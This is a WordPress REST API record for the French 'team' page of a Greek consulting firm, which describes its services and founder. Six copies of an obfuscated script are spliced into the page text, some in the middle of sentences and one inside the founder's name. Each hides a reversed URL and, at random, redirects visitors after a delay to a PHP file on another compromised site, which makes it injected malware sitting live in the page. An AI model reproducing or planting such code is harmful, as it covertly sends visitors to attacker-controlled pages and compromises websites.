{"id":723,"date":"2023-03-08T10:34:39","date_gmt":"2023-03-08T07:34:39","guid":{"rendered":"https:\/\/griffins.gr\/?page_id=723"},"modified":"2023-03-08T14:35:39","modified_gmt":"2023-03-08T11:35:39","slug":"team","status":"publish","type":"page","link":"https:\/\/griffins.gr\/fr\/team\/","title":{"rendered":"GriffinS"},"content":{"rendered":"<p>GriffinS est actif depuis 2018 en Gr\u00e8ce dans la fourniture de services et de solutions de conseil sp\u00e9cialis\u00e9s.<\/p>\n<p>Une assistance est fournie \u00e0 <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script><script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tous les types d&rsquo;entreprises, ind\u00e9pendants et particuliers en mettant l&rsquo;accent sur le professionnalisme et l&rsquo;efficacit\u00e9.<br \/>\nLe fondateur S<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script><script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>toyannou F. Grigorios (\u00c9conomiste MBA &amp; M\u00e9diateur) contribue avec coh\u00e9rence et professionnalisme \u00e0 <script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script><script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>tous les clients, particuliers et entreprises.<\/p>\n<p>\u00ab\u00a0Griffins\u00a0\u00bb, utilisant ses qualifications acad\u00e9miques et sa vaste exp\u00e9rience des affaires, offre des services sp\u00e9cialis\u00e9s \u00e0 ses clients, leur permettant d&rsquo;\u00e9valuer les opportunit\u00e9s d&rsquo;affaires qui leur sont \u00ab\u00a0offertes\u00a0\u00bb, de r\u00e9duire les risques d&rsquo;\u00e9chec de leur entreprise ainsi que de minimiser les personnel et professionnel le danger.<\/p>\n<div class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-511\" src=\"https:\/\/griffins.gr\/wp-content\/uploads\/2019\/02\/Compass-and-money.png\" alt=\"\" width=\"1200\" height=\"800\" srcset=\"https:\/\/griffins.gr\/wp-content\/uploads\/2019\/02\/Compass-and-money.png 1200w, https:\/\/griffins.gr\/wp-content\/uploads\/2019\/02\/Compass-and-money-300x200.png 300w, https:\/\/griffins.gr\/wp-content\/uploads\/2019\/02\/Compass-and-money-768x512.png 768w, https:\/\/griffins.gr\/wp-content\/uploads\/2019\/02\/Compass-and-money-1024x683.png 1024w, https:\/\/griffins.gr\/wp-content\/uploads\/2019\/02\/Compass-and-money-750x500.png 750w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-577\" src=\"https:\/\/griffins.gr\/wp-content\/uploads\/2019\/05\/Untitled-1.jpg\" alt=\"\" width=\"3023\" height=\"3001\" srcset=\"https:\/\/griffins.gr\/wp-content\/uploads\/2019\/05\/Untitled-1.jpg 3023w, https:\/\/griffins.gr\/wp-content\/uploads\/2019\/05\/Untitled-1-150x150.jpg 150w, https:\/\/griffins.gr\/wp-content\/uploads\/2019\/05\/Untitled-1-300x298.jpg 300w, https:\/\/griffins.gr\/wp-content\/uploads\/2019\/05\/Untitled-1-768x762.jpg 768w, https:\/\/griffins.gr\/wp-content\/uploads\/2019\/05\/Untitled-1-1024x1017.jpg 1024w, https:\/\/griffins.gr\/wp-content\/uploads\/2019\/05\/Untitled-1-100x100.jpg 100w, https:\/\/griffins.gr\/wp-content\/uploads\/2019\/05\/Untitled-1-750x745.jpg 750w\" sizes=\"auto, (max-width: 3023px) 100vw, 3023px\" \/><\/p>\n<div class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-703\" src=\"https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20211215_121831-scaled.jpg\" alt=\"\" width=\"2560\" height=\"1920\" srcset=\"https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20211215_121831-scaled.jpg 2560w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20211215_121831-300x225.jpg 300w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20211215_121831-1024x768.jpg 1024w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20211215_121831-768x576.jpg 768w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20211215_121831-1536x1152.jpg 1536w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20211215_121831-2048x1536.jpg 2048w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20211215_121831-750x563.jpg 750w\" sizes=\"auto, (max-width: 2560px) 100vw, 2560px\" \/><\/div>\n<div class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-704\" src=\"https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153311-scaled.jpg\" alt=\"\" width=\"2560\" height=\"1920\" srcset=\"https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153311-scaled.jpg 2560w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153311-300x225.jpg 300w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153311-1024x768.jpg 1024w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153311-768x576.jpg 768w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153311-1536x1152.jpg 1536w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153311-2048x1536.jpg 2048w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153311-750x563.jpg 750w\" sizes=\"auto, (max-width: 2560px) 100vw, 2560px\" \/><\/div>\n<div class=\"wp-block-image\">\n<div class=\"wp-block-image\">\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-706\" src=\"https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153332-scaled.jpg\" alt=\"\" width=\"2560\" height=\"1920\" srcset=\"https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153332-scaled.jpg 2560w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153332-300x225.jpg 300w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153332-1024x768.jpg 1024w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153332-768x576.jpg 768w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153332-1536x1152.jpg 1536w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153332-2048x1536.jpg 2048w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153332-750x563.jpg 750w\" sizes=\"auto, (max-width: 2560px) 100vw, 2560px\" \/><\/p>\n<div class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-707\" src=\"https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153347-1-scaled.jpg\" alt=\"\" width=\"2560\" height=\"2535\" srcset=\"https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153347-1-scaled.jpg 2560w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153347-1-300x297.jpg 300w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153347-1-1024x1014.jpg 1024w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153347-1-150x150.jpg 150w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153347-1-768x760.jpg 768w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153347-1-1536x1521.jpg 1536w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153347-1-2048x2028.jpg 2048w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153347-1-100x100.jpg 100w, https:\/\/griffins.gr\/wp-content\/uploads\/2023\/02\/20220212_153347-1-750x743.jpg 750w\" sizes=\"auto, (max-width: 2560px) 100vw, 2560px\" \/><\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>GriffinS est actif depuis 2018 en Gr\u00e8ce dans la fourniture de services et de solutions de conseil sp\u00e9cialis\u00e9s. Une assistance est fournie \u00e0 tous les types d&rsquo;entreprises, ind\u00e9pendants et particuliers en mettant l&rsquo;accent sur le professionnalisme et l&rsquo;efficacit\u00e9. Le fondateur Stoyannou F. Grigorios (\u00c9conomiste MBA &amp; M\u00e9diateur) contribue avec coh\u00e9rence&hellip; <a class=\"continue\" href=\"https:\/\/griffins.gr\/fr\/team\/\"><span> GriffinS<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template-fullwidth.php","meta":{"footnotes":""},"class_list":["post-723","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/griffins.gr\/fr\/wp-json\/wp\/v2\/pages\/723","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/griffins.gr\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/griffins.gr\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/griffins.gr\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/griffins.gr\/fr\/wp-json\/wp\/v2\/comments?post=723"}],"version-history":[{"count":5,"href":"https:\/\/griffins.gr\/fr\/wp-json\/wp\/v2\/pages\/723\/revisions"}],"predecessor-version":[{"id":735,"href":"https:\/\/griffins.gr\/fr\/wp-json\/wp\/v2\/pages\/723\/revisions\/735"}],"wp:attachment":[{"href":"https:\/\/griffins.gr\/fr\/wp-json\/wp\/v2\/media?parent=723"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}